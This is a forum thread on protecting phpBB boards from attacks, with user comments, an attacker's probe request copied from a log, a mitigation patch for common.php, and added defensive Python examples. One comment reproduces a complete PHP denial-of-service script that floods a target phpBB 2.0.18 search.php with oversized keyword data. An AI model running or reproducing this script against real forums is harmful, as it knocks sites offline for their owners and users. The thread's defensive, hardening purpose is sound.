In-My-Opinion.org

»How to protect your phpBB forum against hackers«

knn:
Argh, hackers!

This is a description of how to make it harder for an attacker to harm your phpBB discussion board, or to gain control over it, should a new security issue be found.

Please also see my other phpBB mods at


My tips will help you to protect your phpBB no matter what future bugs or security issues will be found. And no matter what current security issues exist.

Let's see the history of critical (= very serious) security issues:
phpBB critical update to 2.0.11: My tips would have protected you
phpBB critical update to 2.0.13: My tips would have protected you
phpBB critical update to 2.0.15: My tips would have protected you
phpBB critical update to 2.0.16: My tips would have protected you
phpBB critical update to 2.0.17: My tips would have protected you

Unfortunately, the creators of phpBB do not take the fixing of security issues seriously enough.
• They have no list of all security issues.
• If you have modded your forum a lot (= installed/changed/reprogrammed your forum) you have no chance to update it to the newest (= most secure) state. The automatic updates won't work.
• They have no step-by-step guide on how to fix each one of them. For example, if your version is 2.0.5, then what do you do to manually update it to fix all security issues fast?
• They have no "security checking programs" which you could run and which would report all open security holes found.
• They are impolite: When I mentioned that they either a) treat security issues not seriously OR b) modding not seriously, my topic was locked and I was warned.
• They even refused to fix a security bug (they claimed it was no security issue) that later caused the deletion of whole websites (see below: %2527 bug).


But whatever: This is NOT a description of how to fix known bugs in phpBB anyway.

Moreover, it's NOT ENOUGH to fix the currently known bugs.
• Especially if you use mods (= third-party software for your forum), you are at risk, since these mods may contain security bugs themselves.
• Some exploits are so serious that every minute counts. But take the fixing of 2.0.16 for example: it took phpBB approx. 14 days to fix a serious exploit.


Right now, while I write this, phpbb.com itself is under attack. Their site is unavailable except for the text:
At present phpbb.com is offline due to a group of politically motivated hackers.
...
A third party application looks to have been the problem.
...
Please do not ask us...we simply cannot comment at this time without having further information ourselves. Just as soon as we have a clearer picture, which depending on the condition of our server may be impossible to obtain, we will update the community.
...
We are working to recover the server.
...
The persons who attacked the site deleted all web access logs, all system logs and the root user log. Other critical system folders/files were also deleted


The following tips will prevent 99% of cracks, since most cracks are done by script kiddies who will not waste a lot of time on a single forum.

Some of the tips also apply to software other than phpBB, so you should read them even if you don't use phpBB.

Wow! Excellent! Your post is so great. I find many, not to say all, of your tips useful.
I have bookmarked your website for further reference.


posted by some guest
  


Tip 5 issue question


I don't see the allowedadminipsforautologin.php, was it deleted or moved? Or do I have to log in to see it?

posted by L
  



L:
Or do I have to log in to see it?

Yes, but I have fixed that issue, now you can download it without logging in


posted by knn
  

Re: Tip 11:Encrypt config.php that contains clear text passw



I've installed your Encrypt Config mod exactly as I read it. Sadly, an error occurred:
Warning: mysql_connect(): Access denied for user: 'ÝÍÃÄ@localhost' (Using password: YES) in /home/lepak/public_html/phpbb/db/mysql4.php on line 48

Warning: mysql_error(): supplied argument is not a valid MySQL-Link resource in /home/lepak/public_html/phpbb/db/mysql4.php on line 330

Warning: mysql_errno(): supplied argument is not a valid MySQL-Link resource in /home/lepak/public_html/phpbb/db/mysql4.php on line 331
phpBB : Critical Error

Could not connect to the database

I deleted a.php but my forum would not show up, and I got an error message about how my subsilver config file is missing. FYI, I am using other templates; please advise!


posted by kmoh4346
  

Sorry to dig up but . . .


64.247.38.130 - - [29/Sep/2005:10:40:45 -0400] "GET /admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1&gzipcompress=0&startdownload=1&sid=0f837d3a435f74d231260615ab7aebaa HTTP/1.1" 404 627 "http://www.digitalhijinx.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


I ran across this in my log files this past week. As noted in your second tip(?), I deleted that admin_db_utilities file since I do remote backups and other MySQL tasks through MySQLCC. Just thought I'd drop in and let you know.


posted by retorq
  



retorq:
I ran across this in my log files this past week, as noted in your second tip(?) I deleted that admin_db_utilities file

Yes, you should delete this file and use my backup suite to do backups, see IMO → PhpBB mod (freeware): Backup database and files


posted by knn
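The log line retorq quoted is a good test case for the monitoring side of this tip: once admin_db_utilities.php is deleted, requests for it return 404, but the request itself still tells you someone is probing for it. The following is an added example (not code from this thread or from phpBB) that parses Apache's "combined" log format and raises an alert for requests under /admin/ or /install/ and for the backup script by name. The IP addresses, host names and all sample lines except retorq's are constructed.

```python
"""Flag probes for retired phpBB admin scripts in an Apache access log.

Added example, not code from the thread or from phpBB: a parser for Apache's
"combined" log format plus a rule that reports requests under /admin/ or
/install/ and, by name, admin_db_utilities.php (the file retorq deleted).
A 404 on such a path is still worth an alert: the file is gone, but the
request shows that someone went looking for it.  The IPs, host names and
all log lines except the one from retorq's post are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qs

# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Scripts that should have been deleted from the forum (only the one the
# thread names; extend the set for your own installation)
SENSITIVE_SCRIPTS = {"admin_db_utilities.php"}
# Directories that should never be reachable by the public
PRIVATE_PREFIXES = ("/admin/", "/install/")


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    if len(parts) != 3:
        return None
    rec["method"], target, rec["proto"] = parts
    url = urlsplit(target)
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query)
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Return an alert string for a suspicious request, else None."""
    path = rec["path"]
    script = path.rsplit("/", 1)[-1]
    reasons = []
    if script in SENSITIVE_SCRIPTS:
        reasons.append("sensitive script " + script)
        perform = rec["query"].get("perform")
        if perform:
            reasons.append("perform=" + perform[0])
    elif path.startswith(PRIVATE_PREFIXES):
        reasons.append("admin area " + path)
    if not reasons:
        return None
    outcome = "served" if rec["status"] < 400 else "not served (%d)" % rec["status"]
    return "%s: %s, %s" % (rec["host"], "; ".join(reasons), outcome)


def scan(lines):
    """Run classify over every parseable line and collect the alerts."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            alert = classify(rec)
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample log: line 1 is retorq's line from the post above
SAMPLE_LOG = [
    '64.247.38.130 - - [29/Sep/2005:10:40:45 -0400] "GET /admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1&gzipcompress=0&startdownload=1&sid=0f837d3a435f74d231260615ab7aebaa HTTP/1.1" 404 627 "http://www.digitalhijinx.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.7 - - [29/Sep/2005:11:00:00 -0400] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [29/Sep/2005:11:05:00 -0400] "GET /admin/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The alert distinguishes "served" from "not served": a 200 on /admin/index.php from an unexpected address is the one that needs action, while the 404 on the deleted backup script confirms the tip worked and shows which addresses are scanning for it.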


Let's see... I think knn gives very good advice at IMO → How to protect your phpBB forum against hackers. Unfortunately I can't lose some of the features... but anyone who thinks in terms of security sees that they really make sense! For example, if they get your admin password... it will not be useful, because the admin folder is protected with .htaccess.

Something no one said (I didn't see all replies) is that you can prevent it from being discovered by Google, AltaVista...

just put in your root web site: (ex.:
the file "robots.txt" (www.mywebsite.com/robots.txt) assuming that you have your forum at


in robots.txt:

User-agent: *
Disallow: /forum/


And you will prevent Google and others from finding it... and that means less vulnerability to search worms in search engines! Assuming that you don't need it to be discovered by the search engines... lol.

Sorry for my bad English!


posted by pt_europe
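Two things are worth knowing before relying on the robots.txt above. Disallow is a prefix match that only crawlers choosing to read the file will honour, and the file itself is public, so it also tells any reader where the forum lives. The following is an added example (not from this thread) that feeds pt_europe's two-line robots.txt into Python's standard urllib.robotparser to show both points; the host name www.example.com is a placeholder.

```python
"""What a robots.txt Disallow does and does not do.

Added example, not part of the thread.  It parses the robots.txt from the
post above with urllib.robotparser to show that (1) Disallow is a per-agent
prefix match, (2) it is consulted only by crawlers that choose to read it,
and (3) the file publishes the very path it asks crawlers to skip.
The host name is a placeholder.
"""
from urllib.robotparser import RobotFileParser

# The file exactly as posted above
ROBOTS_TXT = """User-agent: *
Disallow: /forum/
"""

PLACEHOLDER_HOST = "http://www.example.com"  # assumption: any host will do


def build_parser(text):
    """Load robots.txt text into a RobotFileParser without a network fetch."""
    rp = RobotFileParser()
    rp.parse(text.splitlines())
    return rp


def crawler_may_fetch(robots_text, agent, path):
    """True if a crawler that honours robots.txt would fetch path as agent."""
    return build_parser(robots_text).can_fetch(agent, PLACEHOLDER_HOST + path)


def disclosed_paths(robots_text):
    """Every Disallow prefix is readable by anyone who requests /robots.txt."""
    paths = []
    for line in robots_text.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


if __name__ == "__main__":
    for path in ("/forum/viewtopic.php?t=1", "/forum", "/index.html"):
        print(path, "->", crawler_may_fetch(ROBOTS_TXT, "Googlebot", path))
    print("paths advertised to everyone:", disclosed_paths(ROBOTS_TXT))
```

Note the "/forum" case (no trailing slash): it is not covered by "Disallow: /forum/", so a crawler may index a link written that way. Anything that ignores robots.txt, including the search worms pt_europe mentions, sees the forum regardless, which is why this tip only reduces exposure and does not replace the other tips in the thread.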
  



pt_europe:
Something no one said (I didn't see all replies) is that you can prevent it from being discovered by Google, AltaVista...

Well, I know another good method to keep you from being hacked: Don't go online


posted by knn
  


knn:
pt_europe:
Something no one said (I didn't see all replies) is that you can prevent it from being discovered by Google, AltaVista...

Well, I know another good method to keep you from being hacked: Don't go online

well... the "crackers" can always go to your home... loool

Sorry for my bad English!


posted by Johnnyc
  


you mean the white people? What? When? Where? Why?
Johnnyc:
well... the "crackers" can always go to your home... loool



posted by retorq
  

Is there a fix for the 2.0.18 Search Exploit/bug?


Found this on the web for 2.0.18

<?
#
# phpBB2018 examples errors
# SecurityReason.Com (Maksymilian Arciemowicz)
# cxib [at] securityreason [dot] com
# securityreason.com… [GPG]
#

if(isset($_POST['HOST']) AND isset($_POST['CAT']) AND isset($_POST['ILE'])){

$POSTx="SecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSec
urityReasonComSecurityReasonComSecurityReasonComSecurity"; # 2048b

$POST = "mode=results&search_keywords=";

for($x=1; $x<=$_POST['ILE']; $x++){
$POST .= $POSTx; # f(x)=x * 2048b
}


$sock = fsockopen($_POST['HOST'], 80);
if (!$sock) {return false;}

$out = "POST ".$_POST['CAT']."search.php HTTP/1.1\r\n";
$out .= "Host: ".$_POST['HOST']."\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\n";
$out .= "Content-Length: ".strlen($POST)."\n\n";
$out .= $POST."\r\n";

fwrite($sock, $out);

$data="";
while(!feof($sock)) {
$data .= fread($sock,4096);
}

fclose($sock);
$data = substr($data, strpos($data,"\r\n\r\n")+4);

echo $data;

} else {

echo "<CENTER>
<A HREF=\"http://securityreason.com\"><IMG SRC=\"http://securityreason.com/gfx/small_logo.png\"></A><P>
<FORM action=\"\" method=post enctype=\"multipart/form-data\">
HOST: <input TYPE=\"text\" name=\"HOST\"> Like

CATALOG: <input TYPE=\"text\" name=\"CAT\"> Like: /phpBB2/<br>
f(x)= <input TYPE=\"text\" name=\"ILE\" value=\"512\"> x 2048b (example 512 x 2048)<br>
<input TYPE=\"submit\" value=\"Send\">
</FORM>";

}
?>


posted by raven007
  



raven007:
Is there a fix for the 2.0.18 Search Exploit/bug?

This is a general issue with a lot of scripts, not only with phpBB

You might do this:
Open "common.php"
Find

// Define some basic configuration arrays this also prevents 


BEFORE, ADD:

foreach (array('POST', 'GET', 'REQUEST') as $gpc)
{
    // phpBB 2 reads its input from the PHP 4 copies HTTP_POST_VARS, HTTP_GET_VARS, HTTP_REQUEST_VARS
    $gpcc = 'HTTP_' . $gpc . '_VARS';
    if (!empty($GLOBALS[$gpcc]))
    {
        foreach ($GLOBALS[$gpcc] as $index => $ppp)
        {
            // Cut any single string value above 1 MB before the scripts ever see it
            if (is_string($ppp) && strlen($ppp) > 1024*1024)
            {
                $GLOBALS[$gpcc][$index] = substr($ppp, 0, 1024*1024-1) . ' ';
            }
        }
    }
}


OR: use Tip #15, which protects you from this.


posted by knn
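The idea behind knn's common.php snippet is generic: cap every incoming variable at a fixed size before the application code gets to work on it, so an oversized search string is cut rather than processed. The following is an added example (not the phpBB patch and not code from this thread) that renders the same rule in Python and generalises it to nested values, which PHP's HTTP_*_VARS can hold for fields named like field[] and which a one-level loop would not walk; it also returns how many values were cut so the event can be logged. The sample request is constructed.

```python
"""Cap the size of every request variable before the application sees it.

Added example, not the phpBB patch: a Python rendering of the rule in knn's
common.php snippet, generalised to nested values (lists and dicts, the
shape PHP builds for field[] inputs).  Returns the capped structure and the
number of values that were cut, so the caller can log the event.
"""
MAX_VAR_LEN = 1024 * 1024  # same 1 MB ceiling as the snippet above


def cap_value(value, limit=MAX_VAR_LEN):
    """Truncate a string, or recurse into a list/dict; return (value, cut_count)."""
    if isinstance(value, str):
        if len(value) > limit:
            return value[:limit], 1
        return value, 0
    if isinstance(value, list):
        items, cut = [], 0
        for item in value:
            new, n = cap_value(item, limit)
            items.append(new)
            cut += n
        return items, cut
    if isinstance(value, dict):
        out, cut = {}, 0
        for key, item in value.items():
            new, n = cap_value(item, limit)
            out[key] = new
            cut += n
        return out, cut
    # Anything else (numbers, None) is passed through untouched
    return value, 0


def cap_request(request_vars, limit=MAX_VAR_LEN):
    """Apply the cap to a whole GET/POST/REQUEST mapping, as the snippet does per superglobal."""
    return cap_value(request_vars, limit)


# Constructed request: a search form post carrying a 2 MB keyword string,
# alongside an ordinary array field that must survive unchanged
SAMPLE_POST = {
    "mode": "results",
    "search_keywords": "a" * (2 * 1024 * 1024),
    "search_fields": ["all", "b" * 2000],
}

if __name__ == "__main__":
    capped, cut = cap_request(SAMPLE_POST)
    print("values cut:", cut)
    print("search_keywords length after cap:", len(capped["search_keywords"]))
```

Per-variable capping is a safety net inside the application. The cheaper control sits in front of it: Apache's LimitRequestBody directive (real directive, not something from this thread) rejects an oversized POST body before PHP parses it at all, so both layers together are stronger than either alone.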
  


Sorry, but what file is the above mod supposed to be in?

posted by raven
  



raven:
Sorry, but what file is the above mod supposed to be in?

In the only one where it appears. In "common.php"


posted by knn
  

Shared registration protection?


Ok, well I use the Shared Registration mod (http://phpbbhacks.com/download/3689), which involves a shared_config.php file that is similar to the config.php file, but not similar enough for me to modify the Encrypt Your Config mod to encrypt my shared_config.php.

So what's the best way to protect my shared_config file, and if possible, can someone modify the Encrypt Your Config mod to work with the Shared Registration mod too?

Thank you!

posted by Ninja
  


